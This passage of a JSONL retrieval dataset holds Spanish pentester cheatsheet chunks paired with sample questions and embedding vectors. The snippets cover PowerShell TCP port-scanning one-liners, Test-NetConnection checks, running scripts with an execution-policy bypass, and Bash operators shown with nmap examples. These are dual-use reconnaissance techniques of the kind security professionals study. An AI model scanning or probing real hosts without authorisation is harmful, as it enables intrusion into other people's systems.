-0.01047, -0.01246, -0.07518, -0.08341, -0.0152, 0.01048, 0.00156, -0.01419, 0.07806, 0.04385, 0.01705, 0.0652, -0.06141, -0.13251, 0.0079, -0.08762, -0.04225, 0.03488, -0.12712, -0.01974, -0.02741, -0.04465, 0.01668, -0.02716, -0.08939, 0.06585, 0.04493, -0.01582, -0.01107, -0.07269, -0.02371, 0.02214, -0.04414, -0.0281, 0.06502, -0.04519, 0.03807, 0.0219, 0.02012, -0.10338, 0.04868, 0.02317, -0.04644, -0.02899, 0.03464, 0.03213, -0.01716, -0.0107, 0.0234, 0.07532, 0.02442, 0.01008, 0.05196, -0.01476, -0.07569, -0.02088, -0.0028, -0.07716, -0.0276, -0.00165, -0.06849, -0.0814, -0.00358, -0.05388, -0.06157, -0.07303, -0.07838, 0.02384, -0.07376, 0.02559, 0.05919, 0.01589, 0.0289, 0.00558, -0.01136, 0.03731, 0.03101, -0.04114, 0.00427, 0.01836, -0.01872, -0.00894, 0.0146, -0.0007, -0.07133, 0.06112, 0.09758, -0.05867, -0.02593, 0.0172, 0.03846, 0.00684, 0.01832, 0.04787, -0.01206, -0.03102, -0.04067, 0.02514, 0.00905, -0.00561, 0.02337, -0.03447, 0.00959, -0.00758, 0.0289, 0.01264, 0.04703, 0.05118, 0.04318, 0.04576, 0.09252, 0.02603, -0.00346, -0.06448, -0.028, 0.02641, -0.02153, 0.02588, -0.02724, -0.02894, -0.06046, 0.02587, 0.01874, 0.02003, -0.0505, 0.0247, -0.04438, -0.05233, -0.01307, -0.01279, -0.03391, -0.01483, 0.02605, 0.02204, -0.05203, 0.04648, -0.0412]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Solo puertos concretos (instantΓ‘neo)\n```powershell\n53,88,135,139,445 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"$_ ABIERTO\"}; $c.Close() }\n```", "indexar": "cΓ³mo sΓ© rΓ‘pidamente si los puertos 445, 80 u otros estΓ‘n escuchando en una direcciΓ³n IP?", "v": [0.09887, 0.08614, -0.07373, -0.04615, 0.03074, -0.1424, 0.09782, -0.08969, -0.04776, -0.06766, -0.0235, 0.01929, 0.01311, -0.12323, 0.00804, -0.05632, 0.027, 0.0833, 0.04881, -0.10357, -0.10712, 0.11269, -0.07197, -0.01932, 0.00887, 0.07351, -0.00312, 0.07917, -0.06572, -0.03162, -0.01267, -0.00952, -0.02326, -0.06864, -0.10111, -0.1486, -0.03003, 0.11562, 0.01752, 0.13441, 0.01542, 0.0719, -0.02401, -0.12187, 0.15928, -0.01316, -0.03323, -0.07988, 0.07991, -0.06746, -0.14121, 0.01216, -0.01969, 0.03433, -0.07109, 0.08783, 0.06213, 0.04308, 0.01315, -0.05044, -0.07448, 0.11912, -0.05489, -0.01139, 0.09978, -0.07913, -0.07964, 0.01562, -0.10329, -0.10869, -0.00653, -0.08502, -0.10154, 0.14162, 0.07342, -0.00921, 0.0198, 0.0287, 0.03729, 0.00559, 0.10912, 0.04571, -0.0607, -0.11997, -0.09215, -0.02062, 0.03967, -0.09425, -0.03227, -0.13733, 0.00347, 0.01639, -0.02984, 0.06472, 0.00148, -0.02623, 0.00457, 0.11409, -0.00441, 0.04618, 0.0061, 0.06596, -0.08612, 0.05153, 0.09406, 0.11675, 0.02733, -0.12771, 0.07928, 0.0101, -0.06878, 0.08198, 0.06607, -0.13145, -0.00622, -0.06754, 0.00778, -0.11552, 0.05816, 0.00423, -0.02099, -0.07053, -0.01348, 0.02432, -0.03647, -0.01953, 0.00467, 0.12273, 0.07929, -0.01599, 0.07517, -0.03504, -0.02486, -0.04354, 0.10307, -0.01537, -0.05058, -0.01495, -0.0637, -0.04801, 0.00956, 0.03104, -0.00869, -0.05742, 0.07362, -0.07692, 0.02164, -0.02299, -0.05195, -0.00059, 0.00526, 0.09349, -0.00275, 0.02972, -0.02439, 0.08577, 0.06428, -0.09284, -0.04224, -0.00835, 0.0039, 0.02265, -0.02998, -0.0116, 0.04368, -0.03377, -0.10187, 0.01332, 0.10483, -0.04258, -0.06604, 0.05075, -0.07033, -0.10076, -0.01713, -0.07929, -0.04829, -0.01932, 0.00954, 0.00164, -0.04414, -0.02837, -0.0586, -0.11634, -0.05221, -0.01145, 0.03946, -0.02065, -0.02119, 0.07611, 0.10431, 0.01736, -0.05155, 0.03501, -0.04238, 0.03955, -0.0542, -0.01003, -0.06574, -0.03908, -0.032, -0.00546, 0.02616, -0.04125, -0.02495, 0.01836, -0.08269, 0.03329, -0.06063, 0.06502, 0.04905, -0.09237, 0.02186, -0.01829, -0.06341, 0.00249, 0.00591, 0.00323, 0.04178, 0.07842, -0.03257, 0.0426, 0.01337, 0.01949, -0.01315, 0.025, 0.00936, 0.01297, 0.05672, 0.0778, -0.02293, 0.04635, -0.08251, -0.04341, 0.02761, 0.01964, -0.01276, -0.02314, -0.05064, -0.03511, 0.09677, 0.00784, -0.02347, 0.01467, 0.01662, -0.06551, -0.06465, 0.08199, 0.00665, -0.06789, 0.00436, -0.00701, 0.06124, 0.01067, 0.00426, -0.07648]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Test rΓ‘pido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "indexar": "cual es una forma rapida de verificar si un puerto esta abierto?", "v": [-0.08398, 0.06686, -0.26787, -0.00639, 0.10245, -0.0643, 0.19216, -0.1325, -0.11167, -0.21199, -0.02176, -0.0716, 0.03985, -0.01821, 0.07978, -0.08984, -0.01062, 0.01516, 0.10011, 0.01988, -0.02554, -0.10996, -0.0057, -0.12753, 0.01136, 0.07038, -0.05642, 0.03433, -0.10522, -0.0211, 0.04395, 0.05254, 0.05121, 0.04897, -0.05095, -0.01605, 0.15266, -0.01885, 0.07165, 0.10355, -0.04644, 0.06206, 0.02106, 0.01496, 0.04708, -0.064, -0.02296, -0.0264, -0.002, 0.01303, 0.06894, 0.05553, -0.05372, 0.04299, -0.12724, -0.0194, 0.023, 0.01302, 0.03257, -0.05673, 0.01476, -0.02341, 0.02802, -0.06401, -0.07281, -0.06244, 0.03744, 0.09041, -0.02512, -0.05268, -0.03667, 0.01201, 0.01928, 0.07448, -0.08331, -0.05696, -0.07166, -0.00391, 0.08189, 0.06089, 0.06791, 0.05275, 0.0471, -0.07433, -0.07176, -0.09494, -0.06047, -0.04486, 0.00451, -0.07401, 0.03455, 0.01496, 0.00619, 0.15094, -0.06253, 0.00181, -0.04544, 0.10686, -0.06512, 0.07335, 0.05652, 0.00448, -0.10191, 0.02583, -0.01747, -0.01179, -0.15, -0.08373, -0.02113, 0.00552, 0.11178, 0.01647, -0.0462, -0.05584, 0.0067, -0.0592, -0.11674, -0.17178, -0.02159, -0.02183, -0.03986, -0.08796, -0.04991, 0.0285, 0.00347, -0.00675, 0.01937, 0.02583, 0.06664, 0.09079, 0.02983, -0.05328, -0.11743, -0.04978, -0.03079, -0.10935, -0.03586, -0.05186, 0.00447, -0.04035, -0.00862, 0.03206, 0.04421, -0.07493, 0.11571, -0.00082, -0.06227, -0.02921, -0.14379, -0.01453, -0.04024, 0.05281, -0.01679, 0.07286, -0.04374, 0.00483, 0.05748, -0.04442, 0.0065, 0.04999, 0.03837, 0.05073, -0.02753, 0.00328, 0.00596, -0.07773, -0.04932, 0.00849, 0.09386, -0.07002, -0.02881, 0.02051, -0.06965, -0.01706, 0.0171, -0.0096, -0.0961, -0.0393, -0.0384, -0.06334, -0.07233, 0.07026, -0.07434, -0.01326, -0.10131, -0.07305, 0.05767, -0.02738, -0.00711, 0.05736, 0.10049, -0.01713, -0.06318, -0.00649, 0.01431, 0.04576, -0.0082, 0.00287, -0.01228, -0.0257, -0.00086, -0.02177, -0.02426, -0.07302, 0.02044, 0.04988, -0.06363, 0.0275, -0.00718, 0.04277, 0.01738, 0.00889, 0.08288, -0.04467, -0.02798, -0.0056, -0.03451, -0.01484, 0.01421, 0.02832, -0.04458, 0.0453, 0.02884, 0.01606, -0.00874, 0.04656, 0.02334, 0.06858, 0.03636, 0.0319, -0.0138, 0.00893, -0.02201, -0.00607, 0.04313, 0.05594, 0.01965, -0.0046, -0.03418, -0.07454, 0.08154, 0.0426, -0.02036, -0.06429, 0.03703, 0.01575, -0.08879, 0.02422, -0.03312, -0.08759, -0.06464, 0.0561, 0.03315, -0.06726, 0.04543, -0.0395]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Test rΓ‘pido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "indexar": "que herramienta puedo usar para hacer un test rapido de conectividad en un puerto?", "v": [0.1551, 0.03614, -0.25674, -0.16346, 0.07278, -0.06161, 0.01825, -0.02422, -0.03567, -0.07936, -0.13595, 0.03067, -0.01501, -0.02605, -0.07389, 0.03111, 0.06309, 0.0027, 0.01313, -0.07062, 0.02351, -0.03756, -0.1662, -0.06936, 0.05117, 0.11871, 0.06922, 0.0451, -0.18374, 0.02186, -0.06685, 0.06305, 0.10993, 0.02346, -0.13965, -0.06927, 0.07301, 0.0536, 0.08996, 0.12735, -0.00926, 0.06496, -0.08177, -0.00652, 0.09551, 0.02284, 0.02353, -0.07002, -0.03617, 0.11755, -0.04877, -0.10388, -0.15858, -0.02509, -0.07403, -0.0844, 0.14988, -0.10026, 0.01877, -0.13203, -0.05248, 0.01236, -0.03959, -0.02382, -0.04117, -0.038, -0.0307, 0.04516, -0.18722, 0.05876, -0.00991, 0.06439, 0.04717, 0.01941, -0.00691, 0.00073, 0.01651, -0.00216, 0.05326, 0.02076, 0.02868, 0.0079, -0.00433, -0.05277, -0.13622, -0.08934, 0.04421, -0.03587, 0.07381, -0.06866, 0.0077, 0.00644, -0.02201, 0.003, 0.01937, -0.04045, 0.02138, -0.0328, 0.03428, -0.03341, 0.16703, -0.00892, -0.07323, 0.04427, -0.05318, -0.01458, -0.02965, -0.01725, -0.03101, -0.00907, 0.08629, 0.01339, -0.0192, -0.09011, -0.08335, 0.02879, -0.04768, -0.15961, -0.0698, -0.02515, -0.00078, -0.02407, -0.03675, -0.05686, 0.02682, 0.01956, 0.01367, 0.07443, 0.00149, -0.02883, 0.07813, -0.03742, -0.06123, -0.08313, -0.04767, 0.00893, 0.02071, -0.16115, -0.01171, -0.04878, -0.02786, 0.03778, -0.07559, -0.05747, 0.00339, 0.0332, -0.06099, -0.02685, -0.0945, 0.03925, 0.00797, -0.01658, -0.07739, 0.02185, -0.04764, -0.02548, 0.07811, 0.00022, -0.03522, 0.01191, -0.05794, -0.04089, -0.00317, 0.03776, 0.03796, -0.05238, 0.00575, 0.01371, 0.05064, 0.01039, 0.02436, 0.05068, -0.02783, -0.02288, 0.0554, 0.05603, -0.04327, 0.01628, -0.05137, -0.11653, -0.01225, 0.05102, -0.0804, -0.09483, 0.00866, 0.00826, 0.00679, -0.0616, 0.04065, 0.08845, -0.0027, 0.0526, 0.0452, 0.01107, 0.04586, 0.02554, 0.03157, -0.02773, 0.03323, -0.02164, -0.04453, 0.00883, -0.02417, -0.0663, 0.06902, 0.0736, -0.07068, -0.00302, 0.03017, 0.06251, 0.03743, -0.01325, 0.09816, -0.06746, -0.01437, 0.01366, -0.01315, 0.00155, -0.01018, 0.00901, -9e-05, 0.01516, -0.01773, 0.07456, 0.031, 0.09347, 0.00898, -0.01187, 0.00051, -0.00638, 0.04378, -0.02109, -0.0277, -0.05591, 0.03435, -0.02374, -0.01008, -0.04637, -0.05897, -0.03494, -0.01566, 0.0554, -0.01744, 0.02489, -0.03388, -0.03709, -0.05237, 0.01174, -0.07414, -0.09455, -0.05233, 0.02944, 0.09107, -0.06508, 0.01132, 0.02408]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Test rΓ‘pido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "indexar": "como verifico rapidamente si el servicio del puerto 53 responde?", "v": [-0.02166, 0.05475, -0.28734, -0.07752, 0.04496, -0.08098, 0.12185, -0.07613, -0.01665, -0.19655, -0.02567, 0.02794, 0.02714, -0.06914, 0.07716, -0.08203, 0.00273, 0.08896, 0.05942, 0.07021, 0.05134, -0.07319, -0.01202, -0.11078, 0.08419, 0.0795, -0.01734, -0.01685, -0.0755, 0.01895, 0.07912, -0.02969, 0.00796, 0.05707, -0.04349, -0.02746, 0.07158, 0.07431, 0.06577, 0.16221, -0.00819, -0.0586, 0.02203, 0.04487, 0.0789, -0.09249, -0.01559, -0.08503, 0.02389, 0.02856, -0.04156, -0.04535, -0.11114, 0.00802, -0.22226, 0.04932, -0.00324, 0.05834, 0.07844, -0.08886, -0.05161, -0.02948, 0.07137, -0.05897, 0.02722, 0.00218, 0.04253, 0.04922, 0.01471, -0.06419, -0.08119, 0.04911, 0.01965, 0.06358, -0.06713, -0.06441, -0.06875, 0.03036, -0.02688, 0.06663, 0.03613, -0.00069, 0.00814, -0.00991, -0.10785, 0.01904, -0.13146, -0.06048, -0.00575, -0.04416, 0.08445, 0.00478, -0.05323, 0.09661, -0.05754, 0.01056, 0.00612, 0.03065, 0.06153, 0.0062, 0.07142, 0.01741, -0.09888, 0.04476, -0.02443, 0.04462, -0.03183, -0.07775, 0.05183, 0.01171, 0.04714, -0.08718, 0.00249, -0.11721, 0.0338, -0.07385, -0.08218, -0.12797, 0.02997, 0.05306, -0.06251, -0.0768, 0.06996, -0.09329, 0.04935, -0.01808, 0.06275, 0.00816, 0.15743, 0.00746, 0.01993, -0.0378, -0.07457, -0.00284, 0.0342, -0.07458, 0.04555, -0.10665, 0.00611, -0.00938, 0.02704, 0.08065, 0.01471, 0.01925, 0.08592, 0.04213, -0.04182, -0.0527, -0.11425, 0.0582, -0.01587, 0.04547, -0.05343, 0.08685, -0.06076, 0.00344, 0.08495, -0.0785, 0.00591, 0.06431, 0.01611, -0.05973, 0.00307, 0.04225, -0.01115, -0.02974, -0.04252, 0.0573, 0.03339, -0.06318, -0.07064, 0.02863, -0.12155, -0.08911, 0.04501, 0.0724, -0.03866, -0.0403, -0.00455, -0.00045, -0.0647, 0.01402, -0.07384, -0.04045, -0.10063, -0.06829, 0.03626, -0.02976, 0.01432, 0.08228, 0.05, -0.03802, -0.02939, 0.05445, -0.0518, 0.00494, -0.02558, -0.01615, -0.00962, -0.055, -0.03542, 0.0299, -0.01449, -0.00385, -0.03582, 0.0325, -0.0179, 0.0756, -0.01699, 0.04812, -0.01041, 0.03268, 0.11792, 0.02807, -0.04273, -0.02237, 0.03222, -0.0696, -0.00919, 0.0617, -0.00133, 0.03214, -0.01555, 0.04472, -0.02338, 0.04063, 0.06315, 0.0774, 0.1097, 0.05813, -0.0008, 0.03214, -0.0387, -0.03681, 0.03165, 0.03075, 0.07995, -0.01638, -0.02265, -0.08866, 0.08963, 0.04443, -0.05907, -0.01195, 0.0035, 0.01667, -0.03567, 0.0173, 0.00713, -0.04641, -0.02784, 0.06253, 0.04771, -0.05109, 0.02139, -0.08822]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## La regla clave\n- `$c.Connect()` = **sΓ­ncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para lΓ­neas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap Β· Puertos olvidados Β· OSCP MOC", "indexar": "que programa puedo usar para escanear puertos sin que se cuelgue?", "v": [-0.00076, -0.10919, -0.16486, -0.05715, 0.02919, -0.12572, 0.10379, -0.22014, -0.09592, -0.07032, -0.15231, 0.10801, -0.00772, -0.09431, -0.10032, -0.03217, 0.00872, 0.01405, 0.07716, 0.0881, -0.0274, 0.02919, -0.05312, -0.06407, -0.03419, 0.11494, 0.00251, -0.00707, -0.02935, -0.07927, -0.06694, 0.07513, 0.14792, -0.12898, 0.06515, -0.1269, 0.08045, -0.01959, 0.12387, 0.03704, 0.07018, -0.04438, -0.12011, -0.02755, 0.08286, -0.03559, -0.00589, 0.04725, -0.00098, -0.00129, -0.03402, 0.02357, -0.06845, 0.05472, 0.03251, -0.0639, 0.04322, -0.00445, -0.0503, -0.06143, -0.01222, 0.08392, 0.09143, -0.03942, -0.01976, -0.03218, 0.05772, 0.07111, -0.11253, 0.00483, -0.06267, 0.06106, 0.00627, -0.01211, -0.03635, -0.05695, -0.02316, -0.00309, 0.03979, 0.03583, -0.0098, 0.00405, 0.03969, 0.02686, -0.06351, -0.06256, -0.02159, -0.08775, 0.06165, -0.13429, -0.00405, -0.00864, 0.00788, 0.10326, 0.04059, -0.06385, 0.05129, 0.04093, -0.00776, 0.02943, 0.09975, -0.01055, -0.04193, 0.09162, -0.03878, 0.02298, 0.07753, -0.1069, 0.0442, 0.05353, 0.05006, 0.02989, -0.04952, -0.08885, -0.13203, 0.03407, -0.0197, -0.10624, 0.00465, -0.04991, -0.02459, -0.07475, -0.05033, -0.01101, 0.10673, 0.00687, 0.02156, 0.12948, -0.02784, 0.06607, 0.02155, -0.03673, -0.0446, -0.07917, -0.08726, -0.14429, -0.02294, -0.08563, 0.0057, 0.00748, -0.04315, 0.09279, -0.0664, 0.03823, -0.01247, 0.02084, -0.00366, -0.06903, -0.02933, -0.04883, 0.05112, 0.04601, -0.03607, 0.04136, -0.09619, 0.02634, 0.16274, 0.00112, -0.08654, 0.01433, -0.06853, -0.01471, -0.04863, -0.02359, 0.10292, -0.08532, -0.01906, -0.00791, 0.02019, 0.05899, 0.02427, 0.16146, -0.0194, -0.08635, 0.05456, 0.01307, -0.01838, -0.05265, -0.0627, -0.01927, -0.076, 0.07097, 0.00612, -0.04213, -0.03466, -0.07765, -0.05148, -0.0102, -0.03447, 0.06104, -0.05283, 0.01815, 0.02195, -0.02252, -0.05053, 0.0062, 0.02923, 0.04918, 0.03023, -0.06181, 0.02167, 0.05833, 0.03562, -0.02756, 0.11759, 0.0621, -0.09047, 0.01123, 0.09251, 0.12097, -0.02212, -0.06088, 0.02604, 0.00174, -0.00401, 0.01977, -0.01954, 0.07867, 0.04883, 0.07352, -0.04651, 0.02416, -0.00023, 0.09932, 0.00873, -0.02427, 0.01363, 0.03913, 0.01634, 0.0191, 0.00879, -0.04897, -0.05986, -0.04692, -0.01968, -0.01607, -0.03854, -0.02051, -0.012, -0.05757, -0.01785, 0.03864, -0.00866, -0.03734, 0.00489, -0.0087, -0.04793, -0.00525, 0.01367, 0.03182, -0.00341, 0.07769, 0.01515, -0.07161, 0.06175, 0.04736]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## La regla clave\n- `$c.Connect()` = **sΓ­ncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para lΓ­neas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap Β· Puertos olvidados Β· OSCP MOC", "indexar": "con quΓ© puedo hacer un escaneo de tiempo limitado en PowerShell?", "v": [-0.28099, 0.01846, -0.09412, 0.0759, -0.09756, -0.0507, -0.07996, -0.06647, -0.03447, -0.05478, -0.17448, 0.11519, 0.00274, -0.11631, -0.00354, 0.10781, -0.01624, -0.01101, 0.01038, 0.1253, -0.08071, -0.02678, -0.17716, -0.02207, 0.06132, 0.01724, -0.01631, 0.21464, -0.19642, 0.00114, -0.09017, 0.1006, 0.04699, -0.06467, -0.03978, 0.1164, 0.04413, 0.13989, 0.13039, 0.06653, -0.05467, 0.11928, -0.03395, -0.10925, 0.02816, -0.05884, -0.07097, -0.06508, -0.03567, 0.00187, -0.16195, -0.08088, -0.08241, -0.00267, 0.0818, -0.07985, 0.09099, -0.07032, -0.03925, -0.09268, -0.10209, 0.06911, 0.01353, 0.01446, -0.08401, 0.03817, -0.06323, -0.03546, -0.01228, 0.07228, -0.17431, -0.09911, 0.03518, -0.08637, -0.02568, -0.04116, 0.01962, -0.06259, 0.02035, -0.08825, -0.03589, 0.02646, -0.12005, -0.05547, -0.07283, 0.02961, 0.02835, -0.09955, -0.0751, -0.01676, 0.06342, 0.02291, 0.02836, 0.07258, 0.02338, -7e-05, -0.00703, 0.04454, -0.01199, 0.00625, 0.03179, -0.08209, -0.12664, 0.07826, 0.05531, 0.03785, 0.05189, 0.00838, -0.04445, 0.02414, -0.11416, 0.0524, -0.06389, -0.04762, -0.01108, 0.04255, -0.00836, -0.11934, -0.076, 0.02449, -0.00682, -0.02128, -0.03192, 0.00625, 0.08043, 0.0578, 0.02136, -6e-05, 0.07021, -0.05767, -0.03748, -0.00549, -0.00418, -0.06642, -0.04161, -0.00836, 0.02394, 0.01409, 0.01792, -0.04509, -0.01303, 0.00446, -0.039, -0.01215, -0.01039, -0.0283, -0.0578, -0.00131, -0.0502, -0.00556, 0.02495, 0.01792, 0.00116, 0.12661, -0.02413, -0.03142, 0.0183, 0.01655, 0.0292, -0.00923, -0.03292, 0.06245, -0.04379, 0.04034, 0.05723, -0.07728, -0.06183, -0.05246, -0.08528, -0.04056, -0.00684, 0.10823, 0.01201, -0.01153, 0.04405, 0.00405, 0.01049, -0.02449, -0.07457, -0.01172, -0.01583, 0.0477, -0.01821, -0.01065, -0.02487, 0.03318, -0.00377, -0.00881, 0.00221, 0.01196, -0.00061, 0.02018, 0.0592, -0.0655, -0.03587, -0.04331, 0.05754, -0.00504, -0.00433, -0.01858, -0.06849, -0.05223, -0.0508, 0.04307, -0.00182, 0.00087, -0.02896, 0.04251, -0.03055, -0.00753, 0.0708, 0.05658, 0.10788, 0.00909, -0.02917, 0.01733, 0.02144, -0.03786, -0.06525, 0.02424, 0.0109, 0.0251, 0.02963, -0.02076, -0.01515, 0.0064, 0.07568, -0.04301, 0.02016, 0.05549, 0.01399, 0.00383, -0.02988, -0.01666, 0.0367, -0.01433, 0.00809, 0.00877, -0.02416, 0.05827, -0.00038, 0.0647, 0.02119, 0.08519, -0.03232, -0.01705, -0.04447, -0.00538, -0.03691, -0.05643, 0.01635, -0.03765, 0.0233, -0.03676, 0.04757, -0.02665]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## La regla clave\n- `$c.Connect()` = **sΓ­ncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para lΓ­neas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap Β· Puertos olvidados Β· OSCP MOC", "indexar": "quΓ© herramienta sirve para ejecutar scripts de escaneo con control de espera?", "v": [-0.05166, -0.00615, -0.22212, -0.13843, 0.11643, -0.2201, -0.14499, -0.05593, 0.08415, -0.03285, -0.15668, 0.00359, 0.01345, -0.19213, 0.02514, 0.06239, 0.07303, -0.0657, 0.06062, 0.11962, -0.0206, 0.02304, 0.00735, 0.00471, -0.10448, 0.01038, -0.05085, 0.10931, -0.21196, 0.03357, -0.0654, 0.1245, 0.06391, -0.06267, -0.01052, 0.03943, -0.01274, 0.00524, 0.05639, 0.20074, -0.04534, 0.03661, -0.08999, -0.04922, 0.04994, -0.05199, 0.05746, 0.01981, 0.00756, 0.03144, 0.0075, -0.0524, -0.09971, 0.06346, -0.02437, -0.03609, 0.10094, -0.18539, -0.00101, -0.08315, -0.10209, -0.03423, 0.05689, 0.00159, -0.01089, 0.01739, 0.03151, -0.09229, -0.04464, 0.06324, -0.09741, 0.03678, -0.01631, 0.04166, 0.01986, -0.08657, -0.05197, 0.02091, 0.01328, -0.02546, -0.011, -0.05373, -0.16381, -0.00262, -0.01315, -0.10596, -0.09612, -0.03518, -0.0857, -0.04308, 0.05894, 0.00538, 0.01553, 0.02081, 0.06656, -0.00013, 0.06731, -0.03699, 0.0386, 0.03152, 0.10692, -0.09578, -0.10093, 0.1348, 0.04448, 0.079, 0.02557, 0.02706, -0.03695, 0.03482, 0.03504, 0.10129, 0.01307, 0.05256, -0.01622, 0.04311, -3e-05, -0.02854, 0.03143, -0.06352, 0.01679, 0.10201, -0.12363, -0.04968, 0.01247, -0.0567, 0.00501, 0.01345, 0.02255, -0.05316, -0.06225, -0.07349, -0.10271, -0.0121, -0.07136, 0.01285, 0.09688, -0.08404, -0.02944, -0.05144, -0.00238, 0.05054, 0.03023, -0.01809, 0.04074, -0.06202, -0.00221, 0.00224, 0.01859, -0.03959, 0.08891, -0.04366, -0.02568, -0.0035, -0.0502, -0.10524, -0.02805, 0.0688, -0.05065, 0.03722, -0.01645, -0.07902, -0.05199, 0.04681, 0.02468, -0.07152, -0.01478, 0.00048, -0.00504, 0.08165, 0.0529, 0.06246, 0.0711, -0.06321, 0.0126, -0.06443, -0.04567, -0.03164, -0.05362, -0.06638, -0.01897, 0.00763, -0.00427, 0.02117, 0.03528, -0.05845, -0.03237, -0.04255, -0.01262, 0.05832, 0.01978, 0.04197, 0.01697, -0.11085, -0.01353, 0.02678, -0.01947, -0.03691, 0.01603, -0.00794, -0.0456, 0.02347, 0.03782, -0.04054, 0.03275, 0.05279, -0.02618, 0.00148, -0.04041, 0.02869, 0.02487, 0.05749, 0.02429, 0.0357, -0.00259, -0.05268, 0.01634, 0.05459, 0.02427, -0.02396, 0.01165, -0.07073, 0.0401, -0.0529, -0.03926, -0.03153, 0.03534, -0.02351, 0.0051, 0.03319, 0.02243, -0.0542, -0.01548, 0.01049, 0.00065, -0.06683, 0.03754, -0.02365, -0.01463, -0.04102, -0.02747, 0.04992, -0.01404, -0.05509, -0.06594, -0.04043, -0.03178, -0.06337, -0.01669, -0.01757, -0.00852, 0.00665, 0.04962, -0.02239, -0.00669, -0.02339]} -{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tuberΓ­a: salida de uno β†’ entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AΓ‘ADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2ΒΊ solo si el 1ΒΊ tuvo Γ‰XITO mkdir loot && cd loot\n|| OR: el 2ΒΊ solo si el 1ΒΊ FALLΓ“ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustituciΓ³n de comando for ip in $(grep ...)\n* comodΓ­n enum_*.txt\n```", "indexar": "quΓ© comandos sirven para unir la salida de varios programas y pasarla al siguiente?", "v": [0.10725, 0.09453, -0.12981, -0.09455, -0.04005, -0.16596, 0.08514, -0.08126, -0.08061, -0.11444, -0.09116, -0.04679, 0.11265, -0.0728, -0.04348, 0.00931, 0.08023, -0.00851, 0.08793, -0.00018, 0.04369, 0.0259, 0.08455, -0.00874, -0.11171, 0.07513, 0.1005, -0.14521, -0.07127, -0.09771, -0.01361, 0.08327, 0.04707, -0.1595, 0.00946, -0.06647, -0.05687, 0.03903, -0.01595, 0.10781, -0.05911, -0.0214, -0.07385, -0.10379, 0.02855, -0.02423, -0.01736, 0.07634, 0.09698, -0.138, -0.01073, 0.00021, -0.02256, 0.02286, -0.04008, -0.12963, -0.00872, -0.0335, -0.04592, -0.01118, -0.09596, -0.0183, 0.0649, 0.08257, 0.03872, -0.02598, -0.06914, -0.09692, -0.03977, -0.00229, -0.13738, 0.08332, -0.07598, 0.06757, 0.01513, -0.01835, -0.08061, 0.00158, 0.11436, 0.01422, -0.01063, 0.01975, 0.00234, 0.08837, -0.08038, -0.11925, 0.03222, -0.03873, -0.04797, -0.03019, -0.00833, 0.01642, -0.00786, 0.07127, 0.11743, 0.0233, -0.0163, 0.07548, 0.01684, 0.10945, 0.00283, -0.05864, -0.12489, 0.14414, -0.08839, 0.05416, 0.07553, -0.04924, 0.00435, 0.15411, 0.03014, -0.08404, 0.0097, -0.07239, -0.13377, -0.05136, -0.08367, -0.04175, -0.04842, -0.0428, -0.13199, -0.01147, 0.041, 0.07793, 0.07642, 0.03041, -0.01035, 0.09166, 0.03165, 0.03577, -0.01935, -0.05006, 0.0215, -0.05463, -0.06902, 0.06373, 0.09079, 0.07408, -0.07421, -0.11867, 